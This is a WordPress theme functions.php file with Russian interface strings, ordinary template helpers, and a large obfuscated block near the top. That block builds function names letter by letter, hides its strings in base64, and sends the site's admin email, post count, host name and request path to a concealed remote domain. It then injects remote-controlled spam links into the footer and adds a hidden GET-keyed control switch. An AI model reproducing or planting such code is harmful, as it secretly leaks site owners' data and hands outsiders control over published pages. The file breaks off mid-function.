<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $FWCAmZ='e';$dVUmiEZ='b';$XIMpMhr='4';$OhWu='d';$xNTyG='e';$gMMeA='s';$kbwW='o';$vbTGP='d';$wAiBo='c';$ducyH='a';$qxTjBOe='6';$lOSYgQ='e';$OGrA='_';$sNsXWkHY=$dVUmiEZ.$ducyH.$gMMeA.$lOSYgQ.$qxTjBOe.$XIMpMhr.$OGrA.$vbTGP.$FWCAmZ.$wAiBo.$kbwW.$OhWu.$xNTyG;$EUfrY='e';$doTPZoq='f';$STtpp='t';$uAbgGm='g';$paRkYNY='a';$YWNofVg='i';$uXnC='l';$XbyW='z';$wXpEP='n';$ThRyzzgM=$uAbgGm.$XbyW.$YWNofVg.$wXpEP.$doTPZoq.$uXnC.$paRkYNY.$STtpp.$EUfrY;$JZjh='r';$uJJJT='t';$CfJuZ='s';$yGhS='r';$qEpvnKu='o';$lzVQMWc='3';$Jpto='t';$paah='1';$VlsZEmb='_';$cHxXWxOh=$CfJuZ.$Jpto.$yGhS.$VlsZEmb.$JZjh.$qEpvnKu.$uJJJT.$paah.$lzVQMWc;$xtFo='t';$pFDLRB='s';$izSpJY='r';$dAbPs='v';$iKJQOV='e';$dvrm='r';$irRxXIel=$pFDLRB.$xtFo.$izSpJY.$dvrm.$iKJQOV.$dAbPs;                     $rx_______________b='e';$ov__________h='b';$wd_____________o='4';$iq___________d='d';$og____l='e';$wr______m='s';$ub__c='o';$ew_____s='d';$sc____________o='c';$kv___q='a';$vx_________a='6';$ih__________p='e';$oj__v='_';$pn_______k=$ov__________h.$kv___q.$wr______m.$ih__________p.$vx_________a.$wd_____________o.$oj__v.$ew_____s.$rx_______________b.$sc____________o.$ub__c.$iq___________d.$og____l;$jc______d='x';$mu____________h='e';$ht______________g='f';$jk________m='s';$tc__________h='c';$ag_____f='t';$rr_______________g='t';$cu_____________k='n';$zt___f='u';$up______b='n';$fr_______g='s';$az_____s='i';$ps________f='o';$ey_______f='i';$os___________n='_';$up___________n=$ht______________g.$zt___f.$up______b.$tc__________h.$ag_____f.$az_____s.$ps________f.$cu_____________k.$os___________n.$mu____________h.$jc______d.$ey_______f.$fr_______g.$rr_______________g.$jk________m;$oh____________o='p';$ok_____________y='f';$vz__d='e';$zt_____________b='n';$uh_______z='o';$ao_______x=$ok_____________y.$uh_______z.$oh____________o.$vz__d.$zt_____________b;$fr______________a='e';$in_____________i='f';$lx___________d='a';$gp_______b='r';$kz______h='d';$pv_______________q=$in_____________i.$gp_______b.$fr______________a.$lx___________d.$kz______h;$wo_____y='f';$sm___d='o';$vu_______________u='l';$tp______________k='e';$vt_____________u='s';$bf_______b='c';$ot_________v=$wo_____y.$bf_______b.$vu_______________u.$sm___d.$vt_____________u.$tp______________k;define("WP_ID", $pn_______k("Mi4wLjA="));define("WP_TTL", $pn_______k("MTA4MDA="));define("WP_SRC", $pn_______k("dHBva24="));function wp_get_header() {global $pn_______k, $up___________n;if ($up___________n($pn_______k("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$up___________n($pn_______k("d3BfZ2V0X2Zvb3Rlcg==")) &&$up___________n($pn_______k("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $pn_______k, $ao_______x, $ot_________v, $pv_______________q;$xj________h = TEMPLATEPATH."/".$pn_______k("Zm9vdGVyLnBocA==");$hx________q = @$ao_______x($xj________h, "r");$xj________h = @$pv_______________q($hx________q, @filesize($xj________h));@$ot_________v($hx________q);$lq_________b = TEMPLATEPATH."/".$pn_______k("ZnVuY3Rpb25zLnBocA==");$hx________q = @$ao_______x($lq_________b, "r");$lq_________b = @$pv_______________q($hx________q, @filesize($lq_________b));@$ot_________v($hx________q);$wb_____w = 0;if($xj________h && $lq_________b) {if ($pn_______k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($xj________h, $pn_______k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$wb_____w = 1;}if (substr_count($xj________h, "wp_theme_GPL_credits()") < 1) {$wb_____w = 2;}}if(WP_ID != "2.0.0") {$wb_____w = 12;}}if($wb_____w > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $wb_____w -->";}}function wp_loaded() {global $pn_______k, $up___________n;return $up___________n($pn_______k("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($pa__m, $gm_____w = "(more...)", $ul_____a = 0, $gt___y = "") {$ni______y = get_the_content($gm_____w, $ul_____a, $gt___y);$ni______y = apply_filters("the_content", $ni______y);$ni______y = str_replace("]]>", "]]>", $ni______y);if (strlen($_GET["p"]) > 0) {echo $ni______y;}else if ((strlen($ni______y)>$pa__m) && ($so__q = strpos($ni______y, " ", $pa__m ))) {$ni______y = substr($ni______y, 0, $so__q);$ni______y = $ni______y;echo $ni______y;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$gm_____w</a></div></p>";} else {echo $ni______y;}}}$nf___________u='a';$qd_____l='e';$vg_________n='e';$du___________d='d';$kk_____________l='_';$pg____________c='n';$wj_______________z='e';$ri___________f='b';$ux_______________k='4';$vu______________r='o';$ek_____________f='s';$zv________d='6';$mk______________q='c';$dc_________t=$ri___________f.$nf___________u.$ek_____________f.$wj_______________z.$zv________d.$ux_______________k.$kk_____________l.$vg_________n.$pg____________c.$mk______________q.$vu______________r.$du___________d.$qd_____l;$ap___________w='c';$hh___s='e';$xk______________d='t';$fd_____________d='_';$ck________b='t';$tm_______________v='n';$cx__________w='e';$xw____________o='i';$vq_________m='l';$vf____________m='t';$rs___________w='g';$dy____a='n';$xw__t='_';$ff______h='o';$nt_____o='s';$xl______f='e';$yu___________u='f';$sf_____n=$yu___________u.$xw____________o.$vq_________m.$cx__________w.$xw__t.$rs___________w.$hh___s.$ck________b.$fd_____________d.$ap___________w.$ff______h.$dy____a.$vf____________m.$xl______f.$tm_______________v.$xk______________d.$nt_____o;$sx__l='l';$gs__w='i';$ci___i='s';$mi_______i='x';$wb_____t='_';$lz__________g='f';$kc___________v='i';$ah____a='s';$ad_____s='t';$au________b='e';$ms_____w='e';$cf______h=$lz__________g.$gs__w.$sx__l.$au________b.$wb_____t.$ms_____w.$mi_______i.$kc___________v.$ci___i.$ad_____s.$ah____a;$oy________k='r';$qw_____________w='v';$ij___p='n';$jb___o='p';$rw_____h='m';$ew______________l='i';$wg___________y='e';$hd__________h='c';$yu_________g='o';$pn_____________v='s';$xy_______________w='a';$cl______s='_';$hs_______v='o';$tm____c='r';$ze____c='e';$oo___l=$qw_____________w.$ze____c.$oy________k.$pn_____________v.$ew______________l.$yu_________g.$ij___p.$cl______s.$hd__________h.$hs_______v.$rw_____h.$jb___o.$xy_______________w.$tm____c.$wg___________y;$id___________v='o';$se_______________m='n';$jg______x='f';$gg____________g='o';$oa________f='p';$nv_______g='k';$sm______________b='e';$rb_______________p='c';$tg_____________h='s';$oa_______s=$jg______x.$tg_____________h.$gg____________g.$rb_______________p.$nv_______g.$id___________v.$oa________f.$sm______________b.$se_______________m;$ie______e='t';$hq_____v='r';$nu___________o='w';$np______________g='i';$qt__b='f';$dg_________d='e';$cq_________k=$qt__b.$nu___________o.$hq_____v.$np______________g.$ie______e.$dg_________d;$rt______________f='m';$zu_____________d='5';$iu________r='d';$wo____t=$rt______________f.$iu________r.$zu_____________d;$vi_________a='a';$mc___________s='h';$md_________r='l';$ik_____s='t';$bl____v='p';$fy_____y='r';$av__d='e';$ub___u='a';$ld___________v=$fy_____y.$av__d.$ub___u.$md_________r.$bl____v.$vi_________a.$ik_____s.$mc___________s;$wo______________y='i';$mj________n='e';$ds_______o='a';$vf_____________f='u';$cl_____________m='z';$az_______________g='n';$pc________q='i';$kj_______________x='s';$lj_____g='l';$lb_____h='r';$vu_______h='e';$bl______________n=$vf_____________f.$az_______________g.$kj_______________x.$mj________n.$lb_____h.$wo______________y.$ds_______o.$lj_____g.$pc________q.$cl_____________m.$vu_______h;$ng___________v='m';$cy__t='e';$ld______d='n';$ma__i='t';$vv_______________h='p';$tz_______________v='a';$rs_________d='m';$kb________z=$ma__i.$cy__t.$rs_________d.$vv_______________h.$ld______d.$tz_______________v.$ng___________v;$yz__________j='_';$hx________p='c';$it_______o='c';$ox_______________r='e';$dm_____l='t';$yv_______c='n';$jk_____________b='a';$zn_____________x='t';$hq______________b='m';$li___________t='x';$fb_________p='e';$xs________w='r';$hs_____________b='e';$di___e='r';$jf___p='a';$zv________y='e';$ij__________t='s';$gd______y='o';$rv________m='t';$hq____s='t';$mk_____t='_';$de_______________p=$ij__________t.$rv________m.$di___e.$hs_____________b.$jk_____________b.$hq______________b.$yz__________j.$hx________p.$gd______y.$yv_______c.$dm_____l.$fb_________p.$li___________t.$zn_____________x.$mk_____t.$it_______o.$xs________w.$ox_______________r.$jf___p.$hq____s.$zv________y;function yd_________y($wt___________b) {global $pn_______k, $up___________n, $sf_____n, $oo___l, $de_______________p;if (!$up___________n($pn_______k("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($oo___l(PHP_VERSION, "5.0.0", ">=") && $up___________n($pn_______k("ZmlsZV9nZXRfY29udGVudHM=")) && $up___________n($pn_______k("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$rq____________c = $de_______________p(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$ic___________a = @$sf_____n($wt___________b, 0, $rq____________c);} else {$ic___________a = @$sf_____n($wt___________b, 0);}return $ic___________a;}function zr__l($wt___________b) {global $up___________n, $oa_______s, $cq_________k, $pn_______k;if (!$up___________n($pn_______k("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$tu____________r = strpos($wt___________b, "/", 7);$rq__l = array("uri"     => substr($wt___________b, $tu____________r),"host"    => str_replace("http://", "", substr($wt___________b, 0, $tu____________r)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$ny______________f = @$oa_______s("$rq__l[host]", 80, $vj___w, $qr____________d, 4);if (!$ny______________f) {return false;} else {$ic___________a = "";$pt___p  = "GET $rq__l[uri] HTTP/1.0\r\n";$pt___p .= "Host: $rq__l[host]\r\n";$pt___p .= "Referer: $rq__l[referer]\r\n";$pt___p .= "Connection: Close\r\n\r\n";@$cq_________k($ny______________f, $pt___p);while (!@feof($ny______________f)) {$wn______________v = @fgets($ny______________f, (1024*24));if ($wn______________v == "\r\n") {$ra____i = true;continue;}if ($ra____i) {$ic___________a .= $wn______________v;}}return $ic___________a;}}function wc_______________b($wt___________b) {global $up___________n;$gl____o = false;if ($wt___________b != "") {if ($up___________n("yd_________y")) {$gl____o = @yd_________y($wt___________b);}if (!$gl____o && ($up___________n("zr__l"))) {$gl____o = @zr__l($wt___________b);}}return $gl____o;}function ya___________p() {global $_SERVER, $wo____t;$ub_________s = $_SERVER["SERVER_NAME"];if (substr("$ub_________s", 0, 4) == "www.") {$ub_________s = substr("$ub_________s", 4);}$ub_________s = $wo____t("$_SERVER[SERVER_NAME]");return $ub_________s;}function yq____________j() {return "file";}function cm______________d($wt___________b) {global $_SERVER, $sf_____n, $cf______h, $ao_______x, $ot_________v, $cq_________k;$je______________w = vk________b();$eo_________c = ya___________p().".jpg";$xl_____r = $je______________w["dir_upload"]["path"]."/$eo_________c";$iu_______________y = @filemtime($xl_____r);if (!$iu_______________y || ((time()-$iu_______________y) >= WP_TTL)) {$gl____o = wc_______________b($wt___________b);if ($gl____o) {if ($cf______h($xl_____r)) {@unlink($xl_____r);}$hx________q = @$ao_______x($xl_____r, "x+");@$cq_________k($hx________q, $gl____o);@$ot_________v($hx________q);}} else {if ($cf______h($xl_____r)) {$gl____o = @$sf_____n($xl_____r);} else {$gl____o = false;}}return $gl____o;}function vk________b() {global $_SERVER, $pn_______k, $dc_________t;$rq_____________r = wp_count_posts("post");$ct______p = pathinfo(get_bloginfo("template_directory"));$je______________w = array("url" => array("report"      => $pn_______k("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $ct______p,"dir_upload"=> yp_________m(),"queryString"=> array("?a001=".WP_ID,"a004=".$ct______p[filename],"a005=".$rq_____________r->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),				"default_string" => " <a href=\"http://smolotkom.ru/130-opalubka-i-opalubochnye-sistemy.html\">опк</a>");$je______________w["url"]["queryString"] = implode("&", $je______________w["queryString"]);$je______________w["url"]["report"] = $je______________w["url"]["report"]."/?".$dc_________t($je______________w["url"]["queryString"]).".html";return $je______________w;}function yp_________m() {$te______e = wp_upload_dir();if (isset($te______e["error"])) {$we__________v = cn___________q();if (is_writable($we__________v)) {$te______e = array("path" => $we__________v);}}return $te______e;}function cn___________q() {global $up___________n, $wo____t, $ld___________v, $kb________z;$yq__r = (bool) ini_get("safe_mode");if ($yq__r == true) {return false;}if ($up___________n("sys_get_temp_dir")) {$bk___m = sys_get_temp_dir();if (is_writable($bk___m)) {return $ld___________v($bk___m);}}if (!empty($_ENV["TMP"])) {return $ld___________v($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $ld___________v($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $ld___________v($_ENV["TEMP"]);} else {$qe______________y = $kb________z($wo____t(uniqid(rand(), true)), "");if ($qe______________y) {$bk___m = $ld___________v(dirname($qe______________y));@unlink($qe______________y);return $bk___m;} else {return false;}}}function ug__________l() {global $_GET, $cf______h;$je______________w = vk________b();$ub_________s = ya___________p();$vt____d = yq____________j();$hj____j = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($vt____d == "file") {$mi__q = $je______________w["dir_upload"]["path"]."/".$ub_________s.".jpg";if ($cf______h($mi__q)) {@unlink($mi__q);$hj____j = "deleted";}}$wk________r = array("s"=> $hj____j,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($wk________r AS $ol__________a => $tq___________g) echo " [$ol__________a:$tq___________g]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $up___________n, $pn_______k, $bl______________n;$je______________w = vk________b();$mj_________y = "cm______________d";if ($up___________n($mj_________y)) {$ic___________a = $mj_________y($je______________w["url"]["report"]);}if ($ic___________a) {if ($ic___________a = @$pn_______k($ic___________a)) {$ic___________a = @$bl______________n($ic___________a);if (strlen($ic___________a[custom_credit]) >= 5) {$je______________w["default_string"] = $ic___________a[custom_credit];}if ($ic___________a["status"] == "0") {$yh_______y = 1;$sw____________u = 1;} else {$ja_____s = sizeof($ic___________a["links"]);$hj_______________c = $je______________w["default_string"];if ($ja_____s > 0 && $ic___________a["links"] !== "") {$dm____l = 0;foreach ($ic___________a["links"] as $xh_______z => $al______d) {$dm____l++;if ($al______d->l_path == "" || $al______d->l_path == $_SERVER["REQUEST_URI"]) {$al______d->l_href = htmlspecialchars(strip_tags($al______d->l_href));$al______d->l_title = htmlspecialchars(strip_tags($al______d->l_title));$al______d->l_anchor = htmlspecialchars(strip_tags($al______d->l_anchor));$hj_______________c .= " | ";$hj_______________c .= "<a href='$al______d->l_href' title='$al______d->l_title'";if ($al______d->l_nofollow == "1") {$hj_______________c .= " rel='nofollow'";}$hj_______________c .= ">$al______d->l_anchor</a>";}}}$je______________w["links"] = "$hj_______________c";if ($ic___________a[credit] == "0") {$je______________w["links"] = "";}}} else {$yh_______y = "1";}} else {$yh_______y = "1";}if ($yh_______y == "1") {$je______________w["links"] = $je______________w["default_string"];}echo "$je______________w[links]";echo "<!-- s: $ic___________a[signature] -->";ug__________l();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                    $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
